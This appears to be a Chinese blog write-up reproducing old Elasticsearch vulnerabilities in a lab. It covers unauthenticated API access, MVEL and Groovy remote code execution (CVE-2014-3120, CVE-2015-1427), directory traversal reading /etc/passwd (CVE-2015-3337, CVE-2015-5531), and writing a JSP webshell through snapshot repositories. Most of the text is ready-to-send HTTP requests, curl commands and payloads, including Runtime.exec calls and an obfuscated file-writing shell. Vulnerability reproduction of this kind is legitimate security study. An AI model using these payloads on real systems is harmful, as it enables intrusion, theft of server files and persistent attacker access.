- 1调用百度翻译接口demo(完整ajax请求)_调用百度翻译接口demo(完整ajax请求) - 天下大师傅 - csdn博客
- 2循环神经网络_pointwisemultiplication
- 3ThinkPHP5\6 项目中api 多版本控制路由实现方式_thinkphp6版本控制
- 4macos windowserver占用内存_VMware ESXI部署macOS(1)
- 5最新react面试题汇总--持续更新_写一个react 组件 面试题
- 6软考-信息系统项目管理师-信息系统安全管理_自主访问控制模型、强制访问控制模型和基于角色的访问控制模型 安全等级
- 7HarmonyOS鸿蒙基于Java开发: AI关键字提取概述
- 8【python|attention】注意力机制代码
- 9NLP-基础任务-中文分词算法(4)-评价指标:精确率(“模型分词结果集”与“标准答案集”的交集/“模型分词结果集”)、召回率(“模型分词结果集”与“标准答案集”的交集/“标准答案集”)、F1_模型验证 模型结果与标准结果的交集
- 10after train_max_position_embeddings": 514
ElasticSearch漏洞复现_elastic漏洞
赞
踩
ElasticSearch漏洞复现
Elasticsearch 是一个非常强大的搜索引擎。它目前被广泛地使用于各个 IT 公司。Elasticsearch 是由 Elastic 公司创建。它的代码位于 GitHub - elastic/elasticsearch: Free and Open, Distributed, RESTful Search Engine。Elasticsearch 是一个分布式、免费和开放的搜索和分析引擎,适用于所有类型的数据,包括文本、数字、地理空间、结构化和非结构化数据。 Elasticsearch 基于 Apache Lucene 构建,并于 2010 年由 Elasticsearch N.V. 首次发布(现在称为 Elastic)。Elasticsearch 以其简单的 REST API、分布式特性、速度和可扩展性而闻名,是 Elastic Stack 的核心组件,Elastic Stack 是一组用于数据摄取、丰富、存储、分析和可视化的免费开放工具。 通常被称为 ELK Stack。Elastic 公司也同时拥有 Logstash 及 Kibana 开源项目。这个三个项目组合在一起,就形成了 ELK 软件栈。他们三个共同形成了一个强大的生态圈。简单地说,Logstash 负责数据的采集,处理(丰富数据,数据转换等),Kibana 负责数据展示,分析,管理,监督,警报及方案。Elasticsearch 处于最核心的位置,它可以帮我们对数据进行存储,并快速地搜索及分析数据。随着后来的 Beats 加入,ELK 软件栈,也被称为 ELKB。
Elasticsearch未授权访问
原理
未设置密码
影响版本
ALL
复现
直接get请求即可
http://xxxxxxxx:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。
http://xxxxxxxx:9200/_plugin/head/ web管理界面
http://xxxxxxxx:9200/_nodes 查看节点数据
http://xxxxxxxx:9200/_river/_search 查看数据库敏感信息
- 1
- 2
- 3
- 4
ElasticSearch 命令执行漏洞(CVE-2014-3120)
原理
老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。
影响版本
ElasticSearch 1.2之前的版本
复现
访问http://your-ip:9200
开始攻击,直接访问下面的URL即可创建数据
POST /website/blog/ HTTP/1.1
Host: 192.168.0.131:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "test"
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
上图说明存在漏洞
然后,执行任意代码:
POST /_search?pretty HTTP/1.1 Host: 192.168.0.131:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 343 { "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)
原理
CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。
影响版本
ALL
复现
Groovy语言“沙盒”
ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本,但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法:
1 既然对执行Java代码有沙盒,lupin的方法是想办法绕过沙盒,比如使用Java反射
2 Groovy原本也是一门语言,于是tang3另辟蹊径,使用Groovy语言支持的方法,来直接执行命令,无需使用Java语言
- 1
- 2
所以,根据这两种执行漏洞的思路,我们可以获得两个不同的POC。
Java沙盒绕过法:
java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
- 1
Goovy直接执行命令法:
def command='id';def res=command.execute().text;res
- 1
首先,该漏洞需要es中至少存在一条数据,所以我们需要先创建一条数据:
POST /website/blog/ HTTP/1.1
Host: 192.168.0.131:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "test"
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
Goovy直接执行命令
POST /_search?pretty HTTP/1.1
Host: 192.168.0.131:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
Java沙盒绕过法:
POST /_search?pretty HTTP/1.1 Host: 192.168.0.131:9200 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/text Content-Length: 489 { "size":1, "script_fields": { "test#": { "script": "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getInputStream())).readLines()", "lang": "groovy" } } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
ElasticSearch 目录穿越漏洞(CVE-2015-3337)
原理
在安装了具有“site”功能的插件以后,插件目录使用../即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。
影响版本
1.4.5以下/1.5.2以下
复现
访问http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd读取任意文件(不要在浏览器访问):
ElasticSearch 目录穿越漏洞(CVE-2015-5531)
原理
elasticsearch 1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。
影响版本
1.6.1以下
复现
新建一个仓库
PUT /_snapshot/test HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
{
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test"
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
创建一个快照
PUT /_snapshot/test2 HTTP/1.1
Host: 192.168.0.131:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
{
"type": "fs",
"settings": {
"location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
}
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
目录穿越读取任意文件
访问 http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
Elasticsearch写入webshell漏洞(WooYun-2015-110216)
原理
ElasticSearch具有备份数据的功能,用户可以传入一个路径,让其将数据备份到该路径下,且文件名和后缀都可控。
所以,如果同文件系统下还跑着其他服务,如Tomcat、PHP等,我们可以利用ElasticSearch的备份功能写入一个webshell。
和CVE-2015-5531类似,该漏洞和备份仓库有关。在elasticsearch1.5.1以后,其将备份仓库的根路径限制在配置文件的配置项path.repo中,而且如果管理员不配置该选项,则默认不能使用该功能。即使管理员配置了该选项,web路径如果不在该目录下,也无法写入webshell。
影响版本
1.5.x之前。
复现
首先创建一个恶意索引文档:
curl -XPOST http://192.168.0.131:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}'
- 1
- 2
再创建一个恶意的存储库,其中location的值即为我要写入的路径。
curl -XPUT 'http://192.168.0.131:9200/_snapshot/yz.jsp' -d '{
"type": "fs",
"settings": {
"location": "/usr/local/tomcat/webapps/wwwroot/",
"compress": false
}
}'
- 1
- 2
- 3
- 4
- 5
- 6
- 7
存储库验证并创建:
curl -XPUT "http://192.168.0.131:9200/_snapshot/yz.jsp/yz.jsp" -d '{
"indices": "yz.jsp",
"ignore_unavailable": "true",
"include_global_state": false
}'
- 1
- 2
- 3
- 4
- 5
该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串,如,
该shell的作用是向wwwroot下的test.jsp文件中写入任意字符串,如,
http://192.168.0.131:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=wooYun-2015-110216
- 1
我们再访问/wwwroot/test.jsp就能看到了
